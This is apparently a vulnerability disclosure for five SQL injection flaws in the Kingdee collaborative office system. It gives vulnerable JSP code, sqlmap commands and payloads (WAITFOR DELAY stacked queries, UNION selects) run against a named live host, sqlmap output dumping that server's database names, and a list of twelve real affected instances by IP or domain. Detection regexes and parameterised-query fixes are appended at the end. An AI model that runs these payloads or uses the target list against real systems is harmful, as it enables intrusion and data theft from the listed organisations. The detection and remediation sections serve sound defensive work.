Five high-risk SQL injection vulnerabilities in the Kingdee Collaborative Office System

The vulnerable files are:

Code:
/kingdee/Template/TemplateEdit.jsp?RecordID=1
/kingdee/Template/TemplateSave.jsp?FileName=1
/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1
/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1   (the RecordID parameter is the injectable one)
/kingdee/DocumentShow.jsp?Template=1&UserName=1   (the Template parameter is the injectable one)

Data can be dumped directly from every one of these with sqlmap:

0x1 /kingdee/Template/TemplateEdit.jsp (partial vulnerable code)

Code:
sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection())
{
    // mRecordID is the RecordID request parameter; it is concatenated straight into the
    // SQL text, so a single quote in the parameter terminates the literal (injection point)
    String mSql="Select * From Template_File Where RecordID='"+ mRecordID + "'";
    try
    {
        result=DbaObj.ExecuteQuery(mSql);
        if (result.next())
        {
            mRecordID=result.getString("RecordID");
            mFileName=result.getString("FileName");
            mFileType=result.getString("FileType");
            mDescript=result.getString("Descript");
            c_class=result.getString("c_class");
            def_process=result.getString("def_process");
            template_img=result.getString("template_img");
        }

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1"

(Screenshot: 1.PNG)

0x2 /kingdee/Template/TemplateSave.jsp (partial vulnerable code)

Code:
<%
String mRecordID=request.getParameter("RecordID");
String mFileName=request.getParameter("FileName");
String mDescript=request.getParameter("Descript");
String c_class=request.getParameter("c_class");
String def_process=request.getParameter("def_process");
String user_id = PubFunc.toString(session.getAttribute("user_id"));
String default_tmpl = PubFunc.toString(request.getParameter("default_tmpl"));
String template_img = PubFunc.toString(request.getParameter("template_img"));
new Person().set_default_tmpl(default_tmpl,c_class,user_id,"","gj","");

sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection())
{
    java.sql.PreparedStatement prestmt=null;
    // Every request parameter is concatenated into the UPDATE; c_class is not even
    // quoted, so escaping quotes alone would not protect that position
    String mSql="Update Template_File Set FileName = '"+ mFileName +"',Descript = '"+ mDescript +"',c_class="+c_class+",def_process='"+def_process+"',template_img='"+template_img+"' Where RecordID='"+ mRecordID +"'";
    // prepareStatement() receives the already-built string: without ? placeholders
    // and bound values it gives no protection at all
    prestmt =DbaObj.Conn.prepareStatement(mSql);
    //DbaObj.Conn.setAutoCommit(true) ;
    prestmt.execute();
    //DbaObj.Conn.commit();
    prestmt.close();
}
DbaObj.CloseConnection();

response.sendRedirect("TemplateList.jsp");
%>

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateSave.jsp?FileName=1"

(Screenshot: 2.png)

0x3 /kingdee/DocumentEdit.jsp (partial vulnerable code)

Code:
if (DbaObj.OpenConnection())
{
    try
    {
        String mSql="";
        if (!mTemplate.equals(""))
        {
            TableCtrl tc = new TableCtrl();
            // the Template parameter is concatenated into the WHERE clause handed to the helper
            String t_mFileType = tc.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");
            if (t_mFileType!=null && !t_mFileType.equals(""))
                mFileType=t_mFileType;
        }
        // the RecordID parameter is concatenated into the query (the injection point reported above)
        mSql="Select * From Document Where RecordID='"+ mRecordID + "'";
        result=DbaObj.ExecuteQuery(mSql);

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1"

(Screenshot: 3.png)

0x4 /kingdee/DocumentSave.jsp (partial vulnerable code)

Code:
<%
String mRecordID=request.getParameter("RecordID");
if (mRecordID==null) mRecordID="";
String mTemplate=new String(request.getParameter("Template").getBytes("gbk"));
String mSubject=new String(request.getParameter("Subject").getBytes("gbk"));
String mAuthor=new String(request.getParameter("Author").getBytes("gbk"));
String mFileDate=new String(request.getParameter("FileDate").getBytes("gbk"));
String mFileType=new String(request.getParameter("FileType").getBytes("gbk"));
String mHTMLPath=new String(request.getParameter("HTMLPath").getBytes("gbk"));
String mysql = "";
boolean ishave = false;

sysUtil.tools.weboffice.iDBManager2000 DbaObj=new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection())
{
    // RecordID is only null-checked, never validated, before it is concatenated into the query
    mysql="SELECT * from Document Where RecordID='" + mRecordID + "'";
    //...
}

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1" -p RecordID

(Screenshot: 4.png)

0x5 /kingdee/DocumentShow.jsp (partial vulnerable code)

Code:
try {
    String mSql="";
    if (!mTemplate.equals("")) {
        // the Template parameter is concatenated into the WHERE clause passed to getFieldValue
        String t_mFileType = db.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'");
        if (t_mFileType!=null && !t_mFileType.equals(""))
            mFileType=t_mFileType;
    }

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentShow.jsp?Template=1&UserName=1"

(Screenshot: 5.png)

Data dumped with sqlmap:

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs

(Screenshot: data.png)

A few affected instances:

Code:
http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://122.139.60.103:800/kingdee/login/loginpage.jsp

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp

http://222.179.238.182:8082/kingdee/login/loginpage2.jsp

http://222.134.77.23:8080/kingdee/login/loginpage.jsp

http://221.4.245.218:8080/kingdee/login/loginpage.jsp

http://220.189.244.202:8080/kingdee/login/loginpage.jsp

http://222.133.44.10:8080/kingdee/login/loginpage.jsp

http://223.95.183.6:8080/kingdee/login/loginpage.jsp

http://61.190.20.51/kingdee/login/loginpage.jsp

http://60.194.110.187/kingdee/login/loginpage.jsp

http://oa.roen.cn/kingdee/login/loginpage.jsp

Proof of vulnerability:

Code:
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs

sqlmap {1.0-dev-nongit-20150423}   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:59:58

[21:59:59] [INFO] resuming back-end DBMS 'microsoft sql server'
[21:59:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: RecordID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: RecordID=1';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: RecordID=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(81)+CHAR(120)+CHAR(109)+CHAR(90)+CHAR(122)+CHAR(97)+CHAR(81)+CHAR(74)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[22:00:00] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[22:00:00] [INFO] fetching database names
[22:00:00] [INFO] the SQL query used returns 6 entries
[22:00:00] [INFO] resumed: ghcoa
[22:00:00] [INFO] resumed: ghtest
[22:00:00] [INFO] resumed: master
[22:00:00] [INFO] resumed: model
[22:00:00] [INFO] resumed: msdb
[22:00:00] [INFO] resumed: tempdb
available databases [6]:
[*] ghcoa
[*] ghtest
[*] master
[*] model
[*] msdb
[*] tempdb

[22:00:00] [INFO] fetched data logged to text files under 'C:/Users/Administrator/.sqlmap/output/oa.guanhao.com'

[*] shutting down at 22:00:00
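The two payload shapes sqlmap reports above (a quote followed by WAITFOR DELAY, and a UNION ALL SELECT built from CHAR() concatenation) are what an operator of an affected installation would look for in web-server access logs. The following is an added detection example, not part of the original report and not Kingdee's code. It assumes Apache/Tomcat common-log-format lines; the class name KingdeeSqliLogScan, the signature list and the sample log lines are all constructed for the example. It flags only requests to the five JSPs named in the report whose query string, after URL decoding, carries one of those patterns.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not the vendor's code: scans access-log lines for the payload
// shapes shown in the sqlmap output against the five affected JSP pages.
public final class KingdeeSqliLogScan {

    // Request line inside a common-log-format entry: "GET /path?query HTTP/1.1"
    private static final Pattern REQUEST = Pattern.compile("\"(?:GET|POST) (\\S+) HTTP/");

    // Only the five pages named in the report, and only when a query string is present.
    private static final Pattern AFFECTED_PAGE = Pattern.compile(
            "^/kingdee/(?:Template/TemplateEdit|Template/TemplateSave|DocumentEdit|DocumentSave|DocumentShow)\\.jsp\\?");

    // Signatures derived from the two payloads in the sqlmap output (assumed list).
    private static final Pattern[] SIGNATURES = {
            Pattern.compile("(?i)waitfor\\s+delay"),             // time-based stacked query
            Pattern.compile("(?i)union\\s+(?:all\\s+)?select"),  // UNION-based extraction
            Pattern.compile("(?i)char\\(\\d+\\)\\+char\\(\\d+\\)"), // CHAR() marker string
            Pattern.compile("'\\s*;"),                           // quote then statement separator (noisy, low confidence)
    };

    // Decode the request target once, as the servlet container would; a malformed
    // escape sequence falls back to the raw string instead of aborting the scan.
    static String decode(String s) {
        try {
            return URLDecoder.decode(s, "UTF-8");
        } catch (UnsupportedEncodingException | IllegalArgumentException e) {
            return s;
        }
    }

    // Returns the regex that matched for one log line, or null if it looks clean.
    static String classify(String logLine) {
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find()) return null;
        String target = decode(m.group(1));
        if (!AFFECTED_PAGE.matcher(target).find()) return null;
        for (Pattern p : SIGNATURES) {
            if (p.matcher(target).find()) return p.pattern();
        }
        return null;
    }

    // One "signature <- log line" entry per suspicious request.
    static List<String> flag(List<String> lines) {
        List<String> hits = new ArrayList<>();
        for (String line : lines) {
            String sig = classify(line);
            if (sig != null) hits.add(sig + "  <-  " + line);
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample lines (not real traffic); payloads mirror the sqlmap output.
        List<String> sample = Arrays.asList(
            "10.0.0.5 - - [23/Apr/2015:21:59:59 +0800] \"GET /kingdee/Template/TemplateEdit.jsp?RecordID=1 HTTP/1.1\" 200 5120",
            "10.0.0.5 - - [23/Apr/2015:21:59:59 +0800] \"GET /kingdee/Template/TemplateEdit.jsp?RecordID=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1\" 200 5120",
            "10.0.0.5 - - [23/Apr/2015:22:00:00 +0800] \"GET /kingdee/DocumentShow.jsp?Template=1%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%2898%29--&UserName=1 HTTP/1.1\" 200 7300",
            "10.0.0.9 - - [23/Apr/2015:22:00:01 +0800] \"GET /kingdee/login/loginpage.jsp HTTP/1.1\" 200 2048");
        for (String hit : flag(sample)) {
            System.out.println(hit);
        }
    }
}
```

Run against the constructed sample, the first and last lines pass and the two probe lines are reported with the WAITFOR and UNION signatures respectively. The scan decodes only once: URLDecoder turns "+" into a space, so a second pass would corrupt the CHAR()+CHAR() marker.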

Remediation:

Filter the input.
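Filtering on its own is fragile here: in TemplateSave.jsp the c_class value is concatenated without quotes, so escaping quote characters would not close that hole, and TemplateSave.jsp already calls prepareStatement but on a string that already contains the user input. A prepared statement only protects when the SQL text holds ? placeholders and the values are bound with setString/setInt. The following is an added example, not Kingdee's code and not from the original report, showing the three query shapes above rewritten with bound parameters. Table and column names are taken from the report; the class name TemplateDao, the identifier whitelist in getFieldValue, the assumption that c_class is a numeric column, and the assumption that the JDBC Connection comes from the existing DbaObj.Conn are all mine.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Added example, not the vendor's code: parameterised versions of the queries in
// TemplateEdit.jsp, TemplateSave.jsp and the getFieldValue helper used by
// DocumentEdit.jsp / DocumentShow.jsp. The caller supplies the Connection
// (assumed: DbaObj.Conn from the original code).
public final class TemplateDao {

    // Identifiers cannot be bound as parameters, so the helper accepts only names
    // from this list (assumed list, built from the tables/columns in the report).
    private static final Set<String> ALLOWED_IDENTIFIERS = new HashSet<>(Arrays.asList(
            "Template_File", "Document", "RecordID", "FileType", "FileName"));

    private final Connection conn;

    public TemplateDao(Connection conn) {
        this.conn = conn;
    }

    // TemplateEdit.jsp: "Select * From Template_File Where RecordID='"+mRecordID+"'"
    // becomes a query with a placeholder; the value never enters the SQL text.
    public String loadFileName(String recordId) throws SQLException {
        String sql = "SELECT FileName FROM Template_File WHERE RecordID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, recordId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("FileName") : null;
            }
        }
    }

    // TemplateSave.jsp: the UPDATE. c_class was concatenated unquoted in the
    // original; here it is parsed as an integer (numeric column assumed) and
    // bound with setInt, so a non-numeric value is rejected before any SQL runs.
    public int saveTemplate(String recordId, String fileName, String descript,
                            String cClass, String defProcess, String templateImg)
            throws SQLException {
        if (cClass == null) {
            throw new IllegalArgumentException("c_class is required");
        }
        int cClassValue;
        try {
            cClassValue = Integer.parseInt(cClass.trim());
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("c_class must be an integer", e);
        }
        String sql = "UPDATE Template_File SET FileName = ?, Descript = ?, c_class = ?, "
                   + "def_process = ?, template_img = ? WHERE RecordID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, fileName);
            ps.setString(2, descript);
            ps.setInt(3, cClassValue);
            ps.setString(4, defProcess);
            ps.setString(5, templateImg);
            ps.setString(6, recordId);
            return ps.executeUpdate();   // number of rows updated
        }
    }

    // Replacement for getFieldValue(table, column, "RecordID='"+value+"'"): the
    // caller no longer hands over a raw WHERE clause. Table and column names are
    // checked against the whitelist, the key value is bound as a parameter.
    public String getFieldValue(String table, String column, String keyColumn, String keyValue)
            throws SQLException {
        for (String ident : new String[] {table, column, keyColumn}) {
            if (!ALLOWED_IDENTIFIERS.contains(ident)) {
                throw new IllegalArgumentException("identifier not allowed: " + ident);
            }
        }
        String sql = "SELECT " + column + " FROM " + table + " WHERE " + keyColumn + " = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, keyValue);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }
}
```

With this in place, the call tc.getFieldValue("Template_File","FileType","RecordID='"+mTemplate+"'") in DocumentEdit.jsp and DocumentShow.jsp becomes new TemplateDao(DbaObj.Conn).getFieldValue("Template_File", "FileType", "RecordID", mTemplate), and the RecordID lookups in TemplateEdit.jsp and DocumentSave.jsp follow the loadFileName pattern. The same payloads sqlmap used above then arrive in the database as literal string values rather than as SQL.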
